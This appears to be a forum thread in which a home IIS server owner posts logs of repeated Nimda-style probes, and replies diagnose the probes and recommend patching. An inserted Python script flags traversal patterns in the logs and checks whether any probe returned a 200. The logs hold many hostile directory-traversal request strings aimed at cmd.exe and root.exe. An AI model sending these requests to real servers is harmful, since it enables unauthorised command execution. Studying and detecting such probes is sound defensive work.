07:19:25 61.172.21.122 GET /scripts/root.exe 404
07:19:25 61.172.21.122 GET /MSADC/root.exe 404
07:19:25 61.172.21.122 GET /c/winnt/system32/cmd.exe 404
07:19:25 61.172.21.122 GET /d/winnt/system32/cmd.exe 404
07:19:25 61.172.21.122 GET /scripts/..%5c../winnt/system32/cmd.exe 500
07:19:25 61.172.21.122 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
07:19:25 61.172.21.122 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
07:19:25 61.172.21.122 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 404
07:19:25 61.172.21.122 GET /scripts/..?../winnt/system32/cmd.exe 500
07:19:25 61.172.21.122 GET /scripts/..?../winnt/system32/cmd.exe 404
07:19:26 61.172.21.122 GET /winnt/system32/cmd.exe 404
07:19:26 61.172.21.122 GET /winnt/system32/cmd.exe 404
07:19:26 61.172.21.122 GET /scripts/..%5c../winnt/system32/cmd.exe 500
07:19:26 61.172.21.122 GET /scripts/..%5c../winnt/system32/cmd.exe 500
07:19:26 61.172.21.122 GET /scripts/..%5c../winnt/system32/cmd.exe 500
07:19:26 61.172.21.122 GET /scripts/..%2f../winnt/system32/cmd.exe 500
07:27:21 61.149.10.234 GET /scripts/root.exe 404
07:27:28 61.149.10.234 GET /MSADC/root.exe 404
07:27:32 61.149.10.234 GET /c/winnt/system32/cmd.exe 404
07:27:44 61.149.10.234 GET /d/winnt/system32/cmd.exe 404
07:27:48 61.149.10.234 GET /scripts/..%5c../winnt/system32/cmd.exe 500
07:27:51 61.149.10.234 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
07:27:55 61.149.10.234 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
07:27:58 61.149.10.234 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 404
07:28:02 61.149.10.234 GET /scripts/..?../winnt/system32/cmd.exe 500
07:28:08 61.149.10.234 GET /scripts/..?../winnt/system32/cmd.exe 404
07:28:12 61.149.10.234 GET /winnt/system32/cmd.exe 404
07:28:19 61.149.10.234 GET /winnt/system32/cmd.exe 404
07:33:20 61.188.170.31 GET /scripts/root.exe 404
07:33:24 61.188.170.31 GET /MSADC/root.exe 404

Solutions »

  1.   

    Is your IIS directory the default c:\interpub\wwwroot?
      

  2.   

    I changed the directory; it now points to :\inetpub\test. This program is fairly dumb: it tries IIS's default directories and the C/D root directories one by one. I installed a firewall and left only port 80 open to the outside. to mylin2002:
    the access records are under winnt\system32\logfiles\. i'm online: [email protected]
      

  3.   

    to xglcm: I just don't know how to deal with him. Detecting it is easy: IIS keeps logs, and every GET is recorded. It doesn't look like it has succeeded, but it has attacked me five times so far, once an hour, so it seems to be automated attacks in rotation. If this maniac switches to another tool at some point, it will get dangerous. What should I do?
      

  4.   

    Here it comes again; the method seems to have changed slightly.
    Scary, like watching a science-fiction film.
    08:28:40 127.0.0.1 GET /c/ 403
    08:30:31 61.135.12.208 GET /scripts/root.exe 403
    08:30:36 61.135.12.208 GET /MSADC/root.exe 403
    08:30:38 61.135.12.208 GET /c/winnt/system32/cmd.exe 403
    08:30:40 61.135.12.208 GET /d/winnt/system32/cmd.exe 403
    08:30:49 61.135.12.208 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:30:51 61.135.12.208 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:30:56 61.135.12.208 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:30:58 61.135.12.208 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 403
    08:31:01 61.135.12.208 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:31:02 61.135.12.208 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:31:05 61.135.12.208 GET /winnt/system32/cmd.exe 403
    08:31:07 61.135.12.208 GET /winnt/system32/cmd.exe 403
    08:31:09 61.135.12.208 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:15 61.135.12.208 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:17 61.135.12.208 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:19 61.135.12.208 GET /scripts/..%2f../winnt/system32/cmd.exe 403
    08:31:35 61.183.208.94 GET /scripts/root.exe 403
    08:31:45 61.183.208.94 GET /MSADC/root.exe 403
    08:31:45 61.183.208.94 GET /c/winnt/system32/cmd.exe 403
    08:31:45 61.183.208.94 GET /d/winnt/system32/cmd.exe 403
    08:31:46 61.183.208.94 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:46 61.183.208.94 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:31:46 61.183.208.94 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:31:46 61.183.208.94 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 403
    08:31:47 61.183.208.94 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:31:47 61.183.208.94 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:31:47 61.183.208.94 GET /winnt/system32/cmd.exe 403
    08:31:47 61.183.208.94 GET /winnt/system32/cmd.exe 403
    08:31:48 61.183.208.94 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:48 61.183.208.94 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:48 61.183.208.94 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:31:48 61.183.208.94 GET /scripts/..%2f../winnt/system32/cmd.exe 403
      

  5.   

    I'm on ADSL at home. This guy's program also disconnects and redials automatically at regular intervals to change its address. If the state investigated, it could certainly be traced, but I don't know which department is responsible. Please keep following this. The threat is right beside us.
      

  6.   

    Set up a honeypot. Look on project.honeynet.org; there is one for Windows. Wear him out.
      

  7.   

    Here it comes again.
    Truly tireless.
    Nothing else to it; it's like a toad sitting on your foot: it can't bite you, but it disgusts you. (I don't know how to write the word geyin)
    08:58:31 61.133.178.207 GET /scripts/root.exe 403
    08:58:38 61.133.178.207 GET /MSADC/root.exe 403
    08:58:38 61.133.178.207 GET /c/winnt/system32/cmd.exe 403
    08:58:39 61.133.178.207 GET /d/winnt/system32/cmd.exe 403
    08:58:43 61.133.178.207 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:58:44 61.133.178.207 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:58:44 61.133.178.207 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    08:58:46 61.133.178.207 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 403
    08:58:47 61.133.178.207 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:58:49 61.133.178.207 GET /scripts/..?../winnt/system32/cmd.exe 403
    08:58:49 61.133.178.207 GET /winnt/system32/cmd.exe 403
    08:58:51 61.133.178.207 GET /winnt/system32/cmd.exe 403
    08:58:51 61.133.178.207 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:58:52 61.133.178.207 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:58:52 61.133.178.207 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    08:58:54 61.133.178.207 GET /scripts/..%2f../winnt/system32/cmd.exe 403
      

  8.   

    LET ME SEE, TRY my best to help you~!
      

  9.   

    Specter, that thing, can fool him; but if you want to get back at him, you would still need
      

  10.   

    to rujor: I looked at it; there doesn't seem to be a download. Does it have to be bought? Doesn't look like it.
    Thanks
      

  11.   

    It could also be a virus; Nimda spreads exactly this way, using the Unicode vulnerability. Just delete the scripts directory under inetpub. For a proper fix, update IIS and Win2k to the latest versions so your Unicode hole gets patched.
    =fly by=
      

  12.   

    to harry: my system is always up to date; all patches are applied. It's definitely not a virus. I deleted all of it. But the other side doesn't know that, just as he doesn't know that there is nothing on my machine. Here it comes again. Sorry, I won't post it next time.
    09:19:11 61.170.192.124 GET /scripts/root.exe 403
    09:19:11 61.170.192.124 GET /MSADC/root.exe 403
    09:19:11 61.170.192.124 GET /c/winnt/system32/cmd.exe 403
    09:19:11 61.170.192.124 GET /d/winnt/system32/cmd.exe 403
    09:19:11 61.170.192.124 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    09:19:11 61.170.192.124 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    09:19:11 61.170.192.124 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 403
    09:19:11 61.170.192.124 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..?../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..?../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..%5c../winnt/system32/cmd.exe 403
    09:19:12 61.170.192.124 GET /scripts/..%2f../winnt/system32/cmd.exe 403
    Thanks
      

  13.   


    Because you're on ADSL dial-up, your IP only changes within one class C range.
    My guess is this guy is scanning one network segment after another,
    not targeting your particular machine. Your security seems pretty good, though:
    not a single 200.
    Haha, this scanner is very old;
    it scans for some old vulnerabilities.
    SP2 patched them all.
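Reply 13's check (no 200 anywhere in the pasted logs) can be done mechanically. The script below is an added example, not code from the thread: it parses lines in the shape pasted here (time, client IP, method, URI, status), flags requests carrying the root.exe/cmd.exe or encoded-traversal signatures, groups them by client IP and reports whether any probe got a 200 back. The sample lines are copied from the thread's logs, plus one constructed line with a documentation address (192.0.2.10) showing how a successful probe would be reported.

```python
import re
from collections import defaultdict

# Shape of the lines pasted in the thread: "HH:MM:SS client-ip METHOD uri status"
LOG_RE = re.compile(r"^(\d{2}:\d{2}:\d{2})\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})$")

# Targets probed by the Nimda-style scanner in the thread, and encoded "../" forms
PAYLOAD_MARKERS = ("cmd.exe", "root.exe")
TRAVERSAL_MARKERS = ("..%5c", "..%2f", "..%c0%af", "..%c1%1c", "..%255c")

def parse_line(line):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, ip, method, uri, status = m.groups()
    return {"time": ts, "ip": ip, "method": method, "uri": uri, "status": int(status)}

def is_probe(uri):
    u = uri.lower()
    return any(p in u for p in PAYLOAD_MARKERS) or any(t in u for t in TRAVERSAL_MARKERS)

def triage(lines):
    """Group probe requests by client IP.  404 = target file absent, 500 = the
    decoded path could not be served, 403 = forbidden; a 200 on one of these
    URIs means the command was executed and the host needs incident response."""
    per_ip = defaultdict(lambda: {"probes": 0, "statuses": set(), "succeeded": False})
    for raw in lines:
        rec = parse_line(raw)
        if rec is None or not is_probe(rec["uri"]):
            continue
        s = per_ip[rec["ip"]]
        s["probes"] += 1
        s["statuses"].add(rec["status"])
        s["succeeded"] = s["succeeded"] or rec["status"] == 200
    return dict(per_ip)

def compromised_sources(report):
    """Client IPs whose probes got a 200 back; empty list means all were blocked."""
    return sorted(ip for ip, s in report.items() if s["succeeded"])

SAMPLE_LOG = [
    # copied from the logs pasted in the thread
    "07:19:25 61.172.21.122 GET /scripts/root.exe 404",
    "07:19:25 61.172.21.122 GET /MSADC/root.exe 404",
    "07:19:25 61.172.21.122 GET /scripts/..%5c../winnt/system32/cmd.exe 500",
    "07:19:26 61.172.21.122 GET /scripts/..%2f../winnt/system32/cmd.exe 500",
    "08:28:40 127.0.0.1 GET /c/ 403",
    # constructed line (documentation address) showing a probe that succeeded
    "09:40:00 192.0.2.10 GET /scripts/..%5c../winnt/system32/cmd.exe 200",
]
```

Running `triage(SAMPLE_LOG)` on the thread's own lines yields only 404/500/403 statuses and an empty `compromised_sources` result; the constructed 200 line is the one case that would warrant incident response.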
      

  14.   

    Thanks badwood and snsins for putting my mind at ease.
    This scanner looks like a product of the Win2000 era or even earlier; back then the system's default install directory was winnt. I'll close the thread tomorrow. Everyone gets points. There are too many of you to share them among; unfortunately only 100 in total can be given out. Thanks, everyone.